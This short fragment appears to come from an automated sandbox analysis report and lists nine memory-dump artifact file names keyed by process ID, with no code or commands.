memory/4900-166-0x0000000000000000-mapping.dmp
-
memory/4912-167-0x0000000000000000-mapping.dmp
-
memory/4956-168-0x0000000000000000-mapping.dmp
-
memory/4976-169-0x0000000000000000-mapping.dmp
-
memory/4996-170-0x0000000000000000-mapping.dmp
-
memory/5016-171-0x0000000000000000-mapping.dmp
-
memory/5036-172-0x0000000000000000-mapping.dmp
-
memory/5068-173-0x0000000000000000-mapping.dmp
-
memory/5092-175-0x0000000000000000-mapping.dmp